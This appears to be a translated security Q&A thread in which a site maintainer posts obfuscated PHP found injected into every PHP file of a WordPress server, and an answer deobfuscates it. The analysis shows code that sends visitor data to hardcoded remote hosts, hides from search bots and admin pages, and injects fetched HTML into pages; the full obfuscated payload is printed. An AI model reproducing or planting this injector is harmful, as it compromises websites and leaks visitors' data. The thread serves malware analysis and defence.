Questa è una backdoor?

26

Ho trovato il codice qui sotto sul mio sito clienti. Sembra una tipica backdoor nascosta con esadecimale, ma non ne sono sicuro al 100%.

<?php if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]); if ((! strstr($ua,"\x6d3\x695")) and (! strstr($ua,"\x726\x3a\x31"))) $GLOBALS["\x616\x756\x61"]=1; } ?><?php $zdsnpbzghe = 'x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>5c%x7860QUUI&e_SEEB%x5-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%xX;%x5c%x7860msvd}R;*msv%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x55c%x7825tww**WYsboepn)%x5c%x78258:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]2715hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x786]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5464]284]364]6]234]342]58]24]31#-%x5782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%fmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c#)fepmqyf%x5c%x7827*&7-n%x5c%x7860hfsq)!sp!*#ojneb#-278]225]241]334]368]322]3]364]6]2{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%160%x28%42%x66%152%x66%147%x67%42%x2c%163%y35]256]y76]72]y3d]51]y35]274]y4:]82ovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7c%x7825iN}#-!tussfw)%x!isset($GLOBALS["%x61%156%x75%156%x61"])))) %x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvsox7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bub6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256%x7825:|:*r%x5c%x7825:-t%x5c%x782%x782f#%x5c%x7825#%x5c%xx7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;7824-%x5c%x7824]y8%x5cx7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%jyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojRx5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus85csboe))1%x5c%x782f3g%x5c%x7825)!gj!~<ofmyx5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%xx7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%787f_*#fubfsdXk5%x5c%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c3:]68]y76#<%x5c%x78e%x5c%x78b,;uqpuft%x5c%x7860msvd}+;!>!}%x5c%%x5c%x7860TW~%x5c%x7824<%xx7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7317]445]212]445]43]321]87f<*X&Z&S{ftmfV%x5c%x78%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudc%x7825:<**#57]38y]47]67y]37]88y]27]28yx7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x59]274]y85]273]y6g]273]y76]%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#uj4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]Dx7825zB%x5c%x7825z>!HB%x5c%x7860SFTV%x5c%x7860QUUIy76]61]y33]68]y34]68]ypd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGT%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7gA%x5c%x7827doj%x5c%x78256<%xc%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***fufs:~:<*9-1-r%x5c%x7825)s%x5c!>!#]y84]275]y83]273]y76]277fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}c%x7825!<*#}_;#)323ldfid>}&;!osvufs}825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%xgj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjc%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-278256<.msv%x5c%x7860dz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]285]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); };)gj}l;33bq}k;opjudovg}%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%16x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{56<pd%x5c%x7825w6Z6<.4*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%25mm)%x5c%x7825%x5c%ubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<%x7824-%x5c%x7824]26%x5c%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825x5c%x7825Z<^2%x5c%x785c7%x65","%x65%166%x61%154%]#%x5c%x782fr%x5c%x7825%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x786027,*b%x5c%x7827)fepd787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5cftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]%x5c%x7825,3,j%x5c%x7825>j%x7824]25%x5c%x7824-%x5#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#mhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825{ $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return chr(ox5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x:h%x5c%x7825:<#64y]5>}R;msv}.;%x5c%x782f#%x5c%x7W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%7!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)t&b%x5c%x7825!|!*)323zbek!~!#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuop%x7825>%x5c%x782fh%x581]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%xx28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x75c%x78e%x5c%x78b%x5c%x78!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18Rc%x7825!<*::::::-111112)eobs%x5c%x7860un%x7824-%x5c%x7824<%x5c78]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f5]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78255.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y8)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x78c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFb:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!%x782f20QUUI7jsv%x5c%x78257UFH#%x5%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hAx5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=trd($n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%585cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]DwN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x782]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%5c%x7878;0]=])0#)U!%x5c%x7827z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c7;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5D#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgPdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78c%x782f+*0f(-!#]y76]277]y72]265j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%825i%x5c%x785c2^<!Ce*[!%x5cpqsut>j%x5c%x7825!*9!%x5c%x7827!hmqj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj83]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]ojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw5%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y4]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw5]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%xbss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%E{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]28c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x7>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnx5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd}x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y35c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x782x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7822b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x75c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}85c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7826<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfs2fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%>1*!%x5c%x7825b:>1<!fmtf!%x5c%x78255c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825wc%x7824-!%x5c%x7825%25hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%xj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>%x782f7&6|7**111127-K)qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%%x5c%x7824-%x5c%x7824*<!%x5c%x7824c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osv>qp%x5c%x7825!|Z~!<##!>!2p%x%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wbd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x56*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7882f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y8%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825t%x5c%x7827pd%x5c%x782%x5c%x787f;!opjudovg}k~~9{d%-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+f52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462<b%x5c%x7825%x5c%x787f!<X>b!|ftmf!~<**9.-j%x5c%x7825/(.*)/epreg_replacepcxbdxfawf'; $ibnuwgraod = explode(chr((272-228)),'3721,60,1040,44,4913,69,6639,67,4175,25,5385,67,880,43,3781,56,7594,63,2006,29,6509,67,9756,21,3876,22,3532,51,1285,39,7868,58,1712,52,728,25,4442,69,9108,22,2767,44,228,65,6997,43,6357,34,3325,57,7457,39,8745,65,7272,52,4115,37,6100,56,3099,58,9571,37,3965,46,5581,53,6706,36,6742,41,3382,20,4551,40,1898,21,3499,33,3278,47,2964,29,8908,59,5905,39,2357,64,2864,35,1560,42,2525,52,7557,37,9442,64,4231,63,3157,41,144,24,8232,66,2035,34,1381,47,2421,40,3459,40,2811,53,10081,25,9805,67,3234,44,8344,64,5127,59,7423,34,1690,22,4651,27,2461,64,686,42,1241,44,7926,62,8163,69,2701,66,1205,36,4152,23,8472,39,6391,63,8572,47,9385,57,2993,49,6156,47,4294,20,293,52,5774,40,9321,28,8682,63,9935,55,4819,47,753,27,3898,47,1150,55,5322,63,68,22,6203,43,2649,30,5186,27,10054,27,4077,38,9872,63,540,58,1764,70,8115,48,5040,28,9506,65,3198,36,9777,28,168,60,1500,60,6454,55,2180,69,959,59,7763,53,4314,60,2156,24,4011,42,4700,58,5717,57,5213,38,7155,53,4374,68,3837,39,3696,25,6922,29,813,67,1357,24,633,53,8298,46,2331,26,9651,66,7657,56,3071,28,6048,52,496,44,9279,42,3042,29,5251,21,2249,39,4200,31,8810,63,0,68,5020,20,9990,64,5452,59,1324,33,8619,63,377,70,6876,46,4678,22,8967,20,8408,64,7354,42,1602,67,9130,66,4982,38,1428,22,4053,24,5814,22,2899,65,9196,34,90,54,4511,40,6292,65,8066,49,923,36,7095,60,1018,22,8511,61,7396,27,1084,66,5658,59,2629,20,4866,47,6832,44,447,49,8987,69,345,32,7816,52,5272,50,3583,53,5836,38,5511,70,7208,64,6783,49,2577,52,7988,39,5874,31,1969,37,9717,39,3402,57,4591,60,780,33,7496,61,2133,23,598,35,8027,39,1669,21,5991,57,1450,50,6576,63,9056,52,8873,35,6246,46,1834,64,2288,43,9230,49,5944,47,6951,46,9349,36,2069,26,5634,24,3945,20,2095,38,4758,61,5068,59,1919,50,7040,55,7324,30,7713,50,2679,22,9608,43,3636,60'); $hlrywdpqbc=substr($zdsnpbzghe,(44960-34854),(41-34)); if (!function_exists('kscpwxzuhr')) { function kscpwxzuhr($xjucvuiret, $bsoixxpekh) { $uzadkdkdcj = NULL; for($ylffdjxxwv=0;$ylffdjxxwv<(sizeof($xjucvuiret)/2);$ylffdjxxwv++) { $uzadkdkdcj .= substr($bsoixxpekh, $xjucvuiret[($ylffdjxxwv*2)],$xjucvuiret[($ylffdjxxwv*2)+1]); } return $uzadkdkdcj; };} $jztylhmlin="\x20\x2a\x740\x6f7\x632\x774\x782\x20\x2f\x656\x614\x283\x742\x5f2\x650\x6c1\x635\x283\x682\x28\x32\x36\x31\x39\x29\x203\x682\x28\x32\x35\x32\x33\x29\x203\x733\x707\x782\x750\x72\x241\x626\x757\x672\x617\x64\x242\x643\x6e0\x622\x670\x65\x29\x3b\x2f\x206\x6f3\x7a2\x6d5\x765\x6e\x2a\x20"; $nbbppijzpp=substr($zdsnpbzghe,(68445-58332),(68-56)); $nbbppijzpp($hlrywdpqbc, $jztylhmlin, NULL); $nbbppijzpp=$jztylhmlin; $nbbppijzpp=(752-631); $zdsnpbzghe=$nbbppijzpp-1; ?>

Se in realtà è una backdoor, sono curioso di sapere cosa fa, se qualcuno ha il paziente di interpretarlo.

Grazie in anticipo.

Modifica

Il mio cliente non è coinvolto nello sviluppo web e quando gli ho chiesto di questo codice non lo avrebbe sicuramente visto prima.

Ho notato che ora il codice è posizionato nella parte superiore di quasi tutti i file di un'installazione di WordPress, poiché sarebbe stato collocato lì automaticamente.

EDIT 2:

Il codice dannoso è stato infatti inserito in ogni file PHP sul server, non solo all'interno di WordPress.

    
posta Ivar 13.10.2014 - 16:58
fonte

1 risposta

47

No. La backdoor non è su questo script. Questo pezzo di codice altamente offuscato contiene un programma per consentire all'hacker di aggiungere dinamicamente qualsiasi HTML o javascript chiamando in modo casuale un server situato a 31.184.192.250 con uno dei quattro nomi host "33db9538.com", "9507c4e8.com", "e5b57288 .com "," 54dfa1cb.com ".

Il codice deobfuscated ha un aspetto simile al seguente:

// generate hostname
function random($arr, $qw) {
    $arr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    return $arr[rand(0, 1.125)].$qw;
}

// return hostname of malware-hosting server
function cqq($qw)
{
    return random($domarr, $qw);
}

// custom encoding
function en2($s, $q)
{
    $g = "";
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g.$q."q1w2e3r4")); # convert to binary string
        $g.= substr($q, 0, 8);
    }
    return $s^$g; # XOR, bits set in either $s or $g but not both
}

// g_* functions are four different ways to retrieve content from remote URL
function g_1($url)
{
    if(function_exists("file_get_contents") === false) return false;
    $buf = @file_get_contents($url);
    if($buf == "") return false;
    return $buf;
}

function g_2($url)
{
    if(function_exists("curl_init") === false) return false;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $res = curl_exec($ch);
    curl_close($ch);
    if($res == "") return false;
    return $res;
}
....

// try progressively more complicated method if the previous one did not work
function gtd($url)
{
    $co = "";
    $co = @g_1($url);
    if($co !== false) return $co;
    $co = @g_2($url);
    if($co !== false) return $co;
    $co = @g_3($url);
    if($co !== false) return $co;
    $co = @g_4($url);
    if($co !== false) return $co;
    return "";
}

// encode server parameters
function k34($op, $text)
{
    return base64_encode(en2($text, $op));
}

// check if server parameters exist
function check212($param)
{
    if(!isset($_SERVER[$param])) $a = "non";
    else if($_SERVER[$param] == "") $a = "non";
    else $a = $_SERVER[$param];
    return $a;
}

// extract payload
function day212()
{
    $a = check212("HTTP_USER_AGENT");
    $b = check212("HTTP_REFERER");
    $c = check212("REMOTE_ADDR");
    $d = check212("HTTP_HOST");
    $e = check212("PHP_SELF");
    $domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    if(($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin")
     or (preg_match("/google|slurp|msnbot|ia_archiver|yandex|rambler/i", strtolower($a))))
    {
        $o1 = "";
    }
    else {
        $op = mt_rand(100000, 999999);
        $g4 = $op."?".urlencode(urlencode(k34($op, $a).".".k34($op, $b).".".k34($op, $c)
         .".".k34($op, $d).".".k34($op, $e)));
        $url = "http://".cqq(".com")."/".$g4;
        $ca1 = en2(@gtd($url) , $op);
        $a1 = @explode("!NF0", $ca1);
        if(sizeof($a1) >= 2) $o1 = $a1[1];
        else $o1 = "";
    }
    return $o1;
}

// uncompress html to buffer
function dcoo($cz, $length = null)
{
    if(false !== ($dz = @gzinflate($cz))) return $dz;
    if(false !== ($dz = @comgzi($cz))) return $dz;
    if(false !== ($dz = @gzuncompress($cz))) return $dz;
    if(function_exists("gzdecode")) {
        $dz = @gzdecode($cz);
        if(false !== $dz) return $dz;
    }
    return $cz;
}

// callback function to accept buffer and append code at bottom of html
function pa22($v)
{
    Header("Content-Encoding: none");
    $t = dcoo($v);
    if(preg_match("/\<\/body/si", $t)) {
        return preg_replace("/(\<\/body[^\>]*\>)/si", day212()."\n$1", $t, 1);
    }
    else {
        if(preg_match("/\<\/html/si", $t)) {
            return preg_replace("/(\<\/html[^\>]*\>)/si", day212()."\n$1", $t, 1);
        }
        else {
            return $t;
        }
    }
}

// start processing
ob_start("pa22");

/**** original code starts here ****/
....

Il codice sopra è in grado di eludere il rilevamento da parte dei principali motori di ricerca e dell'amministratore del sito, in quanto restituisce una pagina normale quando vengono soddisfatti determinati criteri. Non sono in grado di scoprire quale codice viene aggiunto, poiché il server di hosting malware esegue anche alcune verifiche per verificare se la richiesta proviene da un server infetto.

Sembra che una vulnerabilità di Wordpress sia stata introdotta da una versione priva di patch del plugin MailPoet . Ciò consente a un hacker di caricare uno script malevolo con le credenziali di un amministratore in un tema Wordpress ed eseguire tale file navigando verso l'URL. Puoi trovare ulteriori informazioni da questa sicurezza blog .

Il punto chiave da tenere presente in questo incidente è il backup frequente dei dati e l'aggiornamento del software in modo coscienzioso.

    
risposta data 20.10.2014 - 06:13
fonte

Leggi altre domande sui tag